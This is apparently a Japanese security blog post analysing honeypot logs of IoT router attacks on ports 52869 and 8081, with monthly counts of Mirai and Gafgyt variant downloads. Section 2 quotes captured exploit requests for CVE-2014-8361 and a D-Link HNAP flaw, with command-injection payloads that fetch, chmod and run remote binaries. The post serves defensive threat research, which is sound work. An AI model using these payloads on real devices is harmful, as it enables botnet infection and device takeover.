目次

• 1.調査しようと思ったきっかけ
• 2. 52869/tcp および8081/tcp宛を狙った通信
• 3. 検知数
• 4.マルウェア別検知数
• 5.まとめ

1.調査しようと思ったきっかけ

今回は52869/tcp および8081/tcp宛への拡張子が「.mips」であるマルウェアのダウンロードを狙った通信に関する記事を書きたいと思います。書こうと思ったきっかけは、以下の通りです。

①80ポートの通信を監視しているハニーポッターはtwitter上でもいますが、80ポート以外を監視しているハニーポッタは少なく、需要があるかと思ったため
②普段のブログでダウンロードが多いが、あまり分析できていなかったため

今回、拡張子が「.mips」であるものに絞ったのは自分のハニーポットで検知したものの大半が「.mips」であったためです。

2. 52869/tcp および8081/tcp宛を狙った通信

自分のハニーポット(Honeytrap)で52869/tcp および8081/tcp宛を狙った通信を多く検知しており、実際に検知している主な通信は以下となります。

①
POST /picsdesc.xml HTTP/1.1
Host: xxx.xxx.xxx.xxx:52869
Content-Length: 661
Accept-Encoding: gzip, deflate
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
Accept: */*
User-Agent: python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.2.1.el6.x86_64
Connection: keep-alive

<?xml version="1.0" ?>
<s:Envelope xmlns:s="hxxp://schemas[.]xmlsoap[.]org/soap/envelope/" s:encodingStyle="hxxp://schemas[.]xmlsoap[.]orgg/soap/encoding/">
<s:Body>
<u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1">
<NewRemoteHost></NewRemoteHost>
<NewExternalPort>xxxxx</NewExternalPort>
<NewProtocol>TCP</NewProtocol>
<NewInternalPort>xxxxx</NewInternalPort>
<NewInternalClient>`cd /tmp/;wget hxxp://xxx.xxx.xxx.xxx/xxx/xxx.mips -O xxx/xxx`</NewInternalClient>
<NewEnabled>1</NewEnabled>
<NewPortMappingDescription>syncthing</NewPortMappingDescription>
<NewLeaseDuration>0</NewLeaseDuration>
</u:AddPortMapping>
</s:Body>
</s:Envelope>

②
POST /wanipcn.xml HTTP/1.1
Host: xxx.xxx.xxx.xxx:52869
Content-Length: 627
Accept-Encoding: gzip, deflate
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping..Accept: */*
User-Agent: python-requests/2.4.3 CPython/2.7.9 Linux/3.16.0-5-amd64
Connection: keep-alive

<?xml version="1.0" ?>
<s:Envelope xmlns:s="hxxp://schemas[.]xmlsoap[.]org/soap/envelope/" s:encodingStyle="hxxp://schemas[.]xmlsoap[.]org/soap/encoding/">
<s:Body>
<u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1">
<NewRemoteHost></NewRemoteHost>
<NewExternalPort>xxxxx</NewExternalPort>
<NewProtocol>TCP</NewProtocol>
<NewInternalPort>xxxxx</NewInternalPort>
<NewInternalClient>`cd /tmp/; wget hxxp://xxx.xxx.xxx.xxx/xxx.mips -O d`</NewInternalClient>
<NewEnabled>1</NewEnabled>
<NewPortMappingDescription>syncthing</NewPortMappingDescription>
<NewLeaseDuration>0</NewLeaseDuration>
</u:AddPortMapping>
</s:Body>
</s:Envelope>

③
POST /HNAP1/ HTTP/1.0
Content-Type: text/xml; charset="utf-8"
SOAPAction: hxxp://purenetworks[.]com/HNAP1/`cd /tmp && rm -rf * && wget hxxp://xxx.xxx.xxx.xxx/xxx.mips && chmod +x xxx.mips;./xxx.mips`
Content-Length: 640

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="hxxp://www[.]w3[.]org/2001/XMLSchema-instance" xmlns:xsd="hxxp://www[.]w3[.]org/2001/XMLSchema" xmlns:soap="hxxp://schemas[.]xmlsoap[.]org/soap/envelope/">
<soap:Body><AddPortMapping xmlns="hxxp://purenetworks[.]com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.xxx</InternalClient>
<PortMappingProtocol>TCP</PortMappingProtocol>
<ExternalPort>1234</ExternalPort>
<InternalPort>1234</InternalPort></AddPortMapping>
</soap:Body>
</soap:Envelope>

①および②は、対象ポートは 52869/tcpであり、CVE番号 2014-8361 に該当する Realtek SDK の miniigd SOAP サービスにおける任意のコードを実行される脆弱性を狙ったものです。 miniigdデーモンを含むRealtek SDKを利用するさまざまなデバイスが対象であり、様々なルータが対象となっています。
JVNDB-2014-008039 - JVN iPedia - 脆弱性対策情報データベース

③はD-Link DIR-850L のウェブ管理インターフェースにおける HNAP プロトコルデータの脆弱性を狙ったものとなります。

JVNDB-2017-001662 - JVN iPedia - 脆弱性対策情報データベース

いずれもIoT製品にターゲットを絞った攻撃であり、wgetコマンドでマルウェアを取得してから、パーミッションを変更し、実行する流れです。

3. 検知数

拡張子 mipsを含むダウンロードを試みる通信について、Honeytrapの収集開始時期である8/7からの統計情報となります。検知数は全3182件となります。
※対象ポートは 52869/tcp および8081/tcp

 
9月および10月に検知数が多いですが、最低でも400件近くの検知をしています。
52869/tcp および8081/tcpの検知数の内訳ですが、全3182件の内、8081/tcpが126件であり、他は全て52869/tcpでした。

4.マルウェア別検知数

※ハッシュ値はVirusTotalにURLを入力して、ハッシュ値が取得できたものを記載しており、実際にwgetコマンドなどで検体を取得して計算したものではありません。
空白のものはVirusTotalではハッシュ値が取得できなかったものとなります。
Miraiの亜種ではないもの(Gafgyt の亜種)ものも含まれています。こちらはtwitterで気がつきました。ハッシュ値が分かっているものをVirusTotalで調査したところ、分類は以下となります。


◾️Gafgyt 亜種
Gafgyt（ガフジット）はDDoS攻撃を仕掛ける機能を備えたマルウェアであり、2014年に最初に発見され、その後2015年初頭にソースコードが漏洩しています。ソースコードが漏洩しているため、こちらも亜種が作成しやすいものとなっています。

Linuxを狙う脅威の最新動向 | トレンドマイクロ セキュリティブログ
古いマルウェアを観察するシリーズ（２）Gafgyt - スープの上で

IoTボットネットの第二波？MiraiとGafgytの亜種ボットネットの検知数が増加 - 忙しい人のためのサイバーセキュリティニュース

<対象のマルウェア>
・elf.mips 
・Demon.mips 
・jiren.mips 
・poof.mips 
・vodity.mips
・keiji.mips 


◾️Mirai亜種
IoT製品を狙った大規模なネットワーク攻撃の一部に利用可能な、遠隔操作できるボットにするマルウェアのことを指します。Miraiのソースコードが公開されて以来、様々なMiraiの亜種が次々と誕生しました。
<対象のマルウェア>
・seraph.mips
・loli.lol.mips
・izuku.mips
・salvia.mips
・apep.mips
・kratos.mips
・Botnet.mips
・shit.mips
・yakuza.mips
・qq.mips
・gemini.mips 
・xd.mips

Gafgytの亜種と比較して、Miraiの亜種は種類が多い一方で、一つあたりの検知数が少ないのが特徴でした。機能の変更が頻繁であり、ターゲットを絞った上で攻撃をしているのでしょうか。Gafgytの亜種はelf.mipsおよびDemon.mipsが未だに多数検知しており、使いまわしていると推測されます。
なお、ポート 8081/tcp を狙ったマルウェアダウンロードは以下でした。
・kenjiro.mips
・kalon.mips
・Botnet.mips

本分類を月ごとにまとめてみると以下となります。

分類できないものは不明（おそらく、Gafgy亜種tかMirai亜種のどちらに分類されると思われます）としているため、正確な分析ではないですが、Mirai亜種の検知数に偏りがあることが分かりました。9月および10月に集中して検知した後、11月および12月での検知はほぼない状態でした。これにより、Miraiの亜種はある一定の時期のみに集中して攻撃を試みるのではないかと思われます。

なお、かなり細かい集計になってしまいが、マルウェアの種別ごとにまとめた記事は以下となります。
※もはや、種類が多すぎて、どのマルウェアか区別が困難ですが。。。。。。

Gafgyt亜種は9月までは主にelf.mipsの検知が多かったですが、10月にはelf.mipsとDemon.mipsが半分になり、11月はほぼDemon.mipsとなり、12月観測時点では Demon.mipsが主流となっていました。Mirai亜種と比べると種類が少なく、亜種を作成したら一定期間使い続ける傾向があるようです。

5.まとめ

・拡張子が mips であるファイルダウンロードを狙ったものは52869/tcp および8081/tcp宛の攻撃はCVE番号 2014-8361 に該当する Realtek SDK の miniigd SOAP サービスにおける任意のコードを実行される脆弱性を狙ったものが多い

・拡張子が mips であるファイルはGafgy亜種およびMirai亜種のインストールを狙ったものが多い
・Gafgyt亜種 の検知数は一定であるが、Mirai亜種については検知数にばらつきがある

・Gafgyt亜種は9月までは主にelf.mipsの検知が多かったが10月にはelf.mipsとDemon.mipsが半分になり、12月観測時点では Demon.mipsが主流

改めて、調査してみて今まで全てのMirai亜種だと思っていましたが、Gafgyt亜種も検知していることに気が付きました。今後は時間はかかるかも知れませんが、これらのマルウェアがどのような挙動をするかを分析し、どのような機能が追加されたなど調査できるようにしたいと考えています。

何か過不足やご指摘がございましたら、Twitterもしくは本ブログなどで教えて頂けると幸いです。

Twitter
sec_chick@one_chick_sec

以上、52869/tcp および8081/tcp宛の攻撃に関する分析でした。